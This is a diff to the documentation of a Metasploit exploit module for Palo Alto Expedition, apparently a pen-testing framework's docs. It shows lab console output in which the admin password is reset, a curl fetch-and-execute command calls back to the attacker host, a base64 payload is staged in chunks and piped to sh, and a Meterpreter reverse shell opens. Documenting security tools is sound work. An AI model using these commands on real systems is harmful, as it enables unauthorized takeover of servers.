Update documentation/modules/exploit/linux/http/paloalto_expedition_rce.md

h4x-x0r · bwatters-r7 · web-flow · commit a09ca39dee51 · 2024-11-12T09:03:51.000-06:00
Co-authored-by: Brendan &lt;bwatters@rapid7.com&gt;
diff --git a/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md b/documentation/modules/exploit/linux/http/paloalto_expedition_rce.md
@@ -58,29 +58,56 @@ Running the exploit against Expedition v1.2.91 on Ubuntu Server 20.04.1, using c
 similar to the following:
 
 ```
-msf6 exploit(linux/http/paloalto_expedition_rce) > exploit
+msf6 exploit(linux/http/paloalto_expedition_rce) > exploit 
 
+[*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
+[*] Fetch handler listening on 192.168.137.204:8080
+[*] HTTP server started
+[*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
 [*] Started reverse TCP handler on 192.168.137.204:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
 [+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
 [*] Version retrieved: 1.2.91
-[*] Vulnerable to CVE-2024-5910 and appears to be vulnerable to CVE-2024-9464.
 [+] The target appears to be vulnerable.
+[*] Command chunk size = 30
+[+] Successfully authenticated
+[*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
 [*] Adding a new cronjob...
-[*] Injecting OS command...
-[*] Sending stage (3045380 bytes) to 192.168.137.203
-[*] Meterpreter session 1 opened (192.168.137.204:4444 -> 192.168.137.203:49006) at 2024-10-13 19:30:10 -0400
-[*] cleanup file: /tmp/j
+[*] Staging chunk 1 of 9
+[*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
+[*] Staging chunk 2 of 9
+[*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
+[*] Staging chunk 3 of 9
+[*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
+[*] Staging chunk 4 of 9
+[*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
+[*] Staging chunk 5 of 9
+[*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
+[*] Staging chunk 6 of 9
+[*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
+[*] Staging chunk 7 of 9
+[*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
+[*] Staging chunk 8 of 9
+[*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
+[*] Staging chunk 9 of 9
+[*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
+[+] Command staged; command execution requires a timeout and will take a few seconds.
+[*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
+[*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
+[*] Sending payload to 192.168.137.205 (curl/7.68.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.137.205
+[*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
 [*] Check thy shell.
 
-meterpreter > sysinfo 
-Computer     : 192.168.137.203
+meterpreter > sysinfo
+Computer     : 192.168.137.205
 OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > getuid 
+meterpreter > getuid
 Server username: www-data
-meterpreter > 
 ```
